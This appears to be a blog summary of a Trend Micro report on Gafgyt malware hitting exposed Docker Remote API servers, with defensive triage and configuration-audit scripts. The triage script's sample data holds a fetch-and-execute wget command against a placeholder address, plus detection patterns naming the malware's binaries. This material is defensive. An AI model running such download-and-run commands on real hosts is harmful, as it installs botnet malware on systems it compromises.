Gafgyt Malware Broadens Its Scope in Recent Attacks

December 3, 2024 at 01:48PM

Trend Micro Research reports that Gafgyt malware, which has historically targeted IoT devices, is now also being deployed against misconfigured, publicly exposed Docker Remote API servers. Attackers use the API to create a container, drop the botnet binary inside it, and turn the compromised host into a node for DDoS attacks. Recommendations for securing these servers include strong access controls and authentication on the API, regular monitoring, and educating personnel on best practices.

### Meeting Takeaways

**Key Report Highlights:**
1. **Gafgyt Malware Targeting Docker Servers**:
– Trend Micro Research identified a shift where Gafgyt malware, traditionally targeting IoT devices, is now also being deployed against misconfigured Docker Remote API servers.
– Successfully deploying the malware turns the affected server into a botnet node that attackers use to launch DDoS attacks against other targets.

2. **Attack Process Overview**:
– Attackers exploit publicly exposed Docker Remote API servers by creating a container from the legitimate, unmodified “alpine” Docker image.
– They deploy the Gafgyt botnet binary inside that container; the binary carries a hardcoded command-and-control (C&C) server IP address.

3. **Attack Sequence**:
– The first attempt deploys a Gafgyt binary named “rbot”; if that fails, an alternative binary named “atlas.i586” is tried. Both attempts rely on privilege escalation from inside the container.
– Once running, the malware gathers local IP addresses and can launch DDoS floods over several protocols, including UDP, ICMP and HTTP.

4. **Use of Additional Scripts**:
– If neither container deployment succeeds, attackers fall back to running a shell script named “cve.sh”, which fetches and executes botnet binaries built for other CPU architectures.
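
The deployment pattern above (stock “alpine” image, elevated privileges, a command that fetches and runs one of the named binaries) can be turned into a triage check over `docker inspect` output. The script below is an added example, not code from the Trend Micro report or from Docker: the artifact names come from the report, while the wget/curl fetch, the host-root bind-mount check (a generic escape-to-host indicator, T1611) and the sample records are assumptions constructed for illustration; 198.51.100.10 is a documentation address, not an indicator from the report.

```python
"""Triage `docker inspect` output for the container pattern described above.

Added example, not code from the Trend Micro report: it flags containers that
combine the traits the report attributes to the Gafgyt deployment (a stock
"alpine" image, elevated privileges, a command that fetches and runs one of
the named binaries) plus a generic escape-to-host indicator (T1611).
"""
from __future__ import annotations

import json
import re

# Binary and script names taken from the report.
GAFGYT_ARTIFACTS = ("rbot", "atlas.i586", "cve.sh")
# Assumption: the stager fetches the binary with wget or curl; the report only
# says the binary is deployed into the container.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b")


def container_findings(record: dict) -> list[str]:
    """Return the suspicious properties of one `docker inspect` record."""
    config = record.get("Config") or {}
    host_cfg = record.get("HostConfig") or {}
    # Reduce "alpine", "alpine:3.20", "registry:5000/alpine@sha256:..." to "alpine".
    image = (config.get("Image") or "").split("@", 1)[0]
    image_name = image.rsplit("/", 1)[-1].split(":", 1)[0]
    cmdline = " ".join((config.get("Entrypoint") or []) + (config.get("Cmd") or []))

    findings: list[str] = []
    if host_cfg.get("Privileged"):
        findings.append("privileged container")
    # Assumption: bind-mounting the host root is a generic escape-to-host
    # indicator; the report does not spell out the mounts the actor used.
    for bind in host_cfg.get("Binds") or []:
        if bind.split(":", 1)[0] == "/":
            findings.append(f"host root bind-mounted: {bind}")
    if host_cfg.get("PidMode") == "host":
        findings.append("shares host PID namespace")
    for name in GAFGYT_ARTIFACTS:
        # Match the name as a path component or token, not as a substring.
        if re.search(rf"(?<![\w.]){re.escape(name)}(?![\w.])", cmdline):
            findings.append(f"known Gafgyt artifact in command: {name}")
    if image_name == "alpine" and FETCH_RE.search(cmdline):
        findings.append("stock alpine image whose command downloads content")
    return findings


def triage(inspect_json: str) -> dict[str, list[str]]:
    """Map each container name to its findings; an empty list means nothing matched."""
    return {rec["Name"].lstrip("/"): container_findings(rec) for rec in json.loads(inspect_json)}


# Constructed sample in `docker inspect` shape (fields trimmed to those used).
# 198.51.100.10 is a documentation address, not an indicator from the report.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "Config": {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"]},
        "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
    {
        "Name": "/agitated_turing",
        "Config": {
            "Image": "alpine",
            "Cmd": ["sh", "-c", "wget http://198.51.100.10/rbot -O /tmp/rbot && chmod +x /tmp/rbot && /tmp/rbot"],
        },
        "HostConfig": {"Privileged": True, "Binds": ["/:/mnt"], "PidMode": ""},
    },
])

if __name__ == "__main__":
    for name, findings in triage(SAMPLE_INSPECT).items():
        print(name, "->", findings or "clean")
```

Feed it the output of `docker inspect $(docker ps -aq)` on a host whose API was exposed; the first two checks (privileged, host root bind) are worth alerting on regardless of image, because they describe the escape path rather than one actor's tooling.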

**Security Recommendations**:
– **Enhance Security Controls**: Implement strong access controls and authentication for Docker Remote API servers; the API should never be reachable over unauthenticated TCP.
– **Monitoring and Response**: Regularly monitor for suspicious activities and respond promptly to incidents.
– **Container Best Practices**: Avoid using “Privileged” mode and evaluate container images before deployment.
– **Training**: Educate staff on security best practices relevant to Docker API management.
– **Stay Updated**: Keep abreast of security updates and patch known vulnerabilities promptly.
– **Policy Review**: Regularly update security policies to reflect the latest best practices.
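
The first recommendation is concrete enough to check mechanically. The script below is an added example, not code from the report or from Docker: the two `daemon.json` documents are constructed to show the weak setting (API on every interface, plain TCP) beside the hardened one (one management address, TLS with mandatory client certificates), and the audit reads only the documented daemon.json keys that govern the remote API (`hosts`, `tlsverify`, `tlscacert`, `tlscert`, `tlskey`). The certificate paths and the 10.0.0.5 address are placeholders.

```python
"""Audit a Docker daemon.json for an exposed Docker Remote API.

Added example, not from the report or from Docker: the two configurations are
constructed; the keys checked ("hosts", "tlsverify", "tlscacert", "tlscert",
"tlskey") are the documented daemon.json options that govern the remote API.
"""
from __future__ import annotations

import json
from urllib.parse import urlsplit

# Weak: the API listens on every interface, unencrypted and unauthenticated.
# Anyone who can reach 2375/tcp can create containers exactly as described above.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Hardened: bound to one management address, TLS with mandatory client certs.
# The address and paths are placeholders for your own management network and CA.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/certs/ca.pem",
  "tlscert": "/etc/docker/certs/server-cert.pem",
  "tlskey": "/etc/docker/certs/server-key.pem"
}
"""

# Host values that mean "every interface" (None: no host given, e.g. tcp://:2375).
WILDCARD_HOSTS = {None, "0.0.0.0", "::"}


def audit_daemon_config(text: str) -> list[str]:
    """Return findings for a daemon.json document; empty means no remote-API exposure found."""
    cfg = json.loads(text)
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return []  # Unix socket only: no network-reachable API.

    findings: list[str] = []
    if cfg.get("tlsverify") is not True:
        findings.append(
            f"remote API on {', '.join(tcp_hosts)} without tlsverify: "
            "any client that can reach the port has full control of the daemon"
        )
    else:
        # tlsverify without all three files means the daemon cannot start TLS as intended.
        for key in ("tlscacert", "tlscert", "tlskey"):
            if not cfg.get(key):
                findings.append(f"tlsverify is set but {key} is missing")
    for h in tcp_hosts:
        if urlsplit(h).hostname in WILDCARD_HOSTS:
            findings.append(f"{h} binds every interface; bind a management address instead")
    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, "->", audit_daemon_config(doc) or "no findings")
```

Two caveats when applying the hardened form: on systemd-based distributions the packaged unit already passes `-H fd://`, and Docker refuses to start when `hosts` is also set in `daemon.json`, so move the listener into a unit override instead of setting both; and with `tlsverify`, any client certificate signed by the configured CA is effectively root on the host, so the CA key must be kept off the Docker hosts and issued certificates tracked.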

**Trend Micro Vision One Threat Intelligence**:
– Customers can access Intelligence Reports and Threat Insights to stay informed about emerging threats and the tactics employed by threat actors.
– Available tools help in hunting for malicious indicators related to the Gafgyt malware.

**Hunting Queries**:
– Queries to find hosts where antimalware has detected Gafgyt, plus queries for related anomalous activity.

**MITRE ATT&CK Techniques**:
– Highlighted techniques include:
– **Initial Access**: External Remote Services (T1133)
– **Execution**: Deploying Containers (T1610)
– **Privilege Escalation and Impact**: Escaping to Host (T1611) and Network Denial of Service (T1498).

These takeaways will help in understanding the threat landscape related to the Gafgyt malware and set actionable steps for enhancing security measures on Docker Remote API servers.
